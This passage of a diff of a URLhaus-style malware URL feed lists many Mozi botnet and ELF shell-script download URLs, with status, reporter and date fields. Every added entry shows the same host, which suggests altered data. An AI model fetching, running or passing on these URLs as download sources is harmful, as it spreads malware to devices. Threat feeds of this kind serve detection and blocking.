listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961013","urlhaus_reference":"https://urlhaus.abuse.ch/url/961013/","url":"http://112.168.65.51:41143/bin.sh","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961014","urlhaus_reference":"https://urlhaus.abuse.ch/url/961014/","url":"http://117.247.204.147:42129/Mozi.m","url_status":"offline","host":"117.247.204.147","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961015","urlhaus_reference":"https://urlhaus.abuse.ch/url/961015/","url":"http://117.247.204.127:47403/Mozi.m","url_status":"offline","host":"117.247.204.127","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961011","urlhaus_reference":"https://urlhaus.abuse.ch/url/961011/","url":"http://120.85.184.207:60187/Mozi.m","url_status":"online","host":"120.85.184.207","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961012","urlhaus_reference":"https://urlhaus.abuse.ch/url/961012/","url":"http://117.202.70.191:46097/Mozi.m","url_status":"offline","host":"117.202.70.191","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961010","urlhaus_reference":"https://urlhaus.abuse.ch/url/961010/","url":"http://211.223.74.229:50771/i","url_status":"online","host":"211.223.74.229","date_added":"2021-01-14 16:31:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961216","urlhaus_reference":"https://urlhaus.abuse.ch/url/961216/","url":"http://89.160.20.156:43741/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:44:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961215","urlhaus_reference":"https://urlhaus.abuse.ch/url/961215/","url":"http://89.160.20.156:45803/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:41:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"false","tags":["32-bit","elf","mips"]} +{"id":"961214","urlhaus_reference":"https://urlhaus.abuse.ch/url/961214/","url":"http://89.160.20.156:38611/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:36:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961213","urlhaus_reference":"https://urlhaus.abuse.ch/url/961213/","url":"http://89.160.20.156:35185/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:36:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961212","urlhaus_reference":"https://urlhaus.abuse.ch/url/961212/","url":"http://89.160.20.156:35054/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961207","urlhaus_reference":"https://urlhaus.abuse.ch/url/961207/","url":"http://89.160.20.156:60038/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961208","urlhaus_reference":"https://urlhaus.abuse.ch/url/961208/","url":"http://89.160.20.156:52253/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961209","urlhaus_reference":"https://urlhaus.abuse.ch/url/961209/","url":"http://89.160.20.156:43125/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961210","urlhaus_reference":"https://urlhaus.abuse.ch/url/961210/","url":"http://89.160.20.156:52650/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961211","urlhaus_reference":"https://urlhaus.abuse.ch/url/961211/","url":"http://89.160.20.156:59273/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961206","urlhaus_reference":"https://urlhaus.abuse.ch/url/961206/","url":"http://89.160.20.156:40346/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961204","urlhaus_reference":"https://urlhaus.abuse.ch/url/961204/","url":"http://89.160.20.156:44242/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961205","urlhaus_reference":"https://urlhaus.abuse.ch/url/961205/","url":"http://89.160.20.156:40624/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961202","urlhaus_reference":"https://urlhaus.abuse.ch/url/961202/","url":"http://89.160.20.156:41245/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961203","urlhaus_reference":"https://urlhaus.abuse.ch/url/961203/","url":"http://89.160.20.156:48866/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961198","urlhaus_reference":"https://urlhaus.abuse.ch/url/961198/","url":"http://89.160.20.156:58258/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961199","urlhaus_reference":"https://urlhaus.abuse.ch/url/961199/","url":"http://89.160.20.156:34516/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961200","urlhaus_reference":"https://urlhaus.abuse.ch/url/961200/","url":"http://89.160.20.156:47851/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961201","urlhaus_reference":"https://urlhaus.abuse.ch/url/961201/","url":"http://89.160.20.156:49226/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961197","urlhaus_reference":"https://urlhaus.abuse.ch/url/961197/","url":"http://89.160.20.156:36957/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961196","urlhaus_reference":"https://urlhaus.abuse.ch/url/961196/","url":"http://89.160.20.156:53089/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961193","urlhaus_reference":"https://urlhaus.abuse.ch/url/961193/","url":"http://89.160.20.156:57114/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961194","urlhaus_reference":"https://urlhaus.abuse.ch/url/961194/","url":"http://89.160.20.156:33163/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961195","urlhaus_reference":"https://urlhaus.abuse.ch/url/961195/","url":"http://89.160.20.156:48557/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961192","urlhaus_reference":"https://urlhaus.abuse.ch/url/961192/","url":"http://89.160.20.156:59976/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:31:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961191","urlhaus_reference":"https://urlhaus.abuse.ch/url/961191/","url":"http://89.160.20.156:48291/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961190","urlhaus_reference":"https://urlhaus.abuse.ch/url/961190/","url":"http://89.160.20.156:45797/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:21:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961186","urlhaus_reference":"https://urlhaus.abuse.ch/url/961186/","url":"http://89.160.20.156:43741/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961187","urlhaus_reference":"https://urlhaus.abuse.ch/url/961187/","url":"http://89.160.20.156:35446/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961188","urlhaus_reference":"https://urlhaus.abuse.ch/url/961188/","url":"http://89.160.20.156:35720/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961189","urlhaus_reference":"https://urlhaus.abuse.ch/url/961189/","url":"http://89.160.20.156:50501/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961185","urlhaus_reference":"https://urlhaus.abuse.ch/url/961185/","url":"http://89.160.20.156:55796/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961183","urlhaus_reference":"https://urlhaus.abuse.ch/url/961183/","url":"http://89.160.20.156:52308/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961184","urlhaus_reference":"https://urlhaus.abuse.ch/url/961184/","url":"http://89.160.20.156:59154/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961177","urlhaus_reference":"https://urlhaus.abuse.ch/url/961177/","url":"http://89.160.20.156:57950/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961178","urlhaus_reference":"https://urlhaus.abuse.ch/url/961178/","url":"http://89.160.20.156:33520/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961179","urlhaus_reference":"https://urlhaus.abuse.ch/url/961179/","url":"http://89.160.20.156:45525/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961180","urlhaus_reference":"https://urlhaus.abuse.ch/url/961180/","url":"http://89.160.20.156:38430/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961181","urlhaus_reference":"https://urlhaus.abuse.ch/url/961181/","url":"http://89.160.20.156:4096/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961182","urlhaus_reference":"https://urlhaus.abuse.ch/url/961182/","url":"http://89.160.20.156:50631/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961176","urlhaus_reference":"https://urlhaus.abuse.ch/url/961176/","url":"http://89.160.20.156:37989/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961175","urlhaus_reference":"https://urlhaus.abuse.ch/url/961175/","url":"http://89.160.20.156:54078/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961173","urlhaus_reference":"https://urlhaus.abuse.ch/url/961173/","url":"http://89.160.20.156:34201/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961174","urlhaus_reference":"https://urlhaus.abuse.ch/url/961174/","url":"http://89.160.20.156:56573/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961172","urlhaus_reference":"https://urlhaus.abuse.ch/url/961172/","url":"http://89.160.20.156:48291/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:08:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961170","urlhaus_reference":"https://urlhaus.abuse.ch/url/961170/","url":"http://89.160.20.156:60102/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961171","urlhaus_reference":"https://urlhaus.abuse.ch/url/961171/","url":"http://89.160.20.156:52225/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961167","urlhaus_reference":"https://urlhaus.abuse.ch/url/961167/","url":"http://89.160.20.156:56733/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961168","urlhaus_reference":"https://urlhaus.abuse.ch/url/961168/","url":"http://89.160.20.156:57042/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961169","urlhaus_reference":"https://urlhaus.abuse.ch/url/961169/","url":"http://89.160.20.156:38035/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961165","urlhaus_reference":"https://urlhaus.abuse.ch/url/961165/","url":"http://89.160.20.156:33540/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961166","urlhaus_reference":"https://urlhaus.abuse.ch/url/961166/","url":"http://89.160.20.156:51947/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961164","urlhaus_reference":"https://urlhaus.abuse.ch/url/961164/","url":"http://89.160.20.156:36915/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961163","urlhaus_reference":"https://urlhaus.abuse.ch/url/961163/","url":"http://89.160.20.156:38865/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961162","urlhaus_reference":"https://urlhaus.abuse.ch/url/961162/","url":"http://89.160.20.156:55480/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961161","urlhaus_reference":"https://urlhaus.abuse.ch/url/961161/","url":"http://89.160.20.156:51996/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961160","urlhaus_reference":"https://urlhaus.abuse.ch/url/961160/","url":"http://89.160.20.156:36042/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961158","urlhaus_reference":"https://urlhaus.abuse.ch/url/961158/","url":"http://89.160.20.156:34350/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961159","urlhaus_reference":"https://urlhaus.abuse.ch/url/961159/","url":"http://89.160.20.156:53587/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961157","urlhaus_reference":"https://urlhaus.abuse.ch/url/961157/","url":"http://89.160.20.156:53444/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961155","urlhaus_reference":"https://urlhaus.abuse.ch/url/961155/","url":"http://89.160.20.156:58653/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961156","urlhaus_reference":"https://urlhaus.abuse.ch/url/961156/","url":"http://89.160.20.156:50579/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961152","urlhaus_reference":"https://urlhaus.abuse.ch/url/961152/","url":"http://89.160.20.156:3553/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961153","urlhaus_reference":"https://urlhaus.abuse.ch/url/961153/","url":"http://89.160.20.156:35288/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961154","urlhaus_reference":"https://urlhaus.abuse.ch/url/961154/","url":"http://89.160.20.156:46429/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961151","urlhaus_reference":"https://urlhaus.abuse.ch/url/961151/","url":"http://89.160.20.156:44575/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961149","urlhaus_reference":"https://urlhaus.abuse.ch/url/961149/","url":"http://89.160.20.156:43245/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961150","urlhaus_reference":"https://urlhaus.abuse.ch/url/961150/","url":"http://89.160.20.156:50444/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961144","urlhaus_reference":"https://urlhaus.abuse.ch/url/961144/","url":"http://89.160.20.156:51318/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961145","urlhaus_reference":"https://urlhaus.abuse.ch/url/961145/","url":"http://89.160.20.156:46221/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961146","urlhaus_reference":"https://urlhaus.abuse.ch/url/961146/","url":"http://89.160.20.156:51430/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961147","urlhaus_reference":"https://urlhaus.abuse.ch/url/961147/","url":"http://89.160.20.156:52028/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961148","urlhaus_reference":"https://urlhaus.abuse.ch/url/961148/","url":"http://89.160.20.156:48291/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961143","urlhaus_reference":"https://urlhaus.abuse.ch/url/961143/","url":"http://89.160.20.156:39613/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961142","urlhaus_reference":"https://urlhaus.abuse.ch/url/961142/","url":"http://89.160.20.156:34201/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:56:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961141","urlhaus_reference":"https://urlhaus.abuse.ch/url/961141/","url":"http://89.160.20.156:47095/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961136","urlhaus_reference":"https://urlhaus.abuse.ch/url/961136/","url":"http://89.160.20.156:42004/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961137","urlhaus_reference":"https://urlhaus.abuse.ch/url/961137/","url":"http://89.160.20.156:52058/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 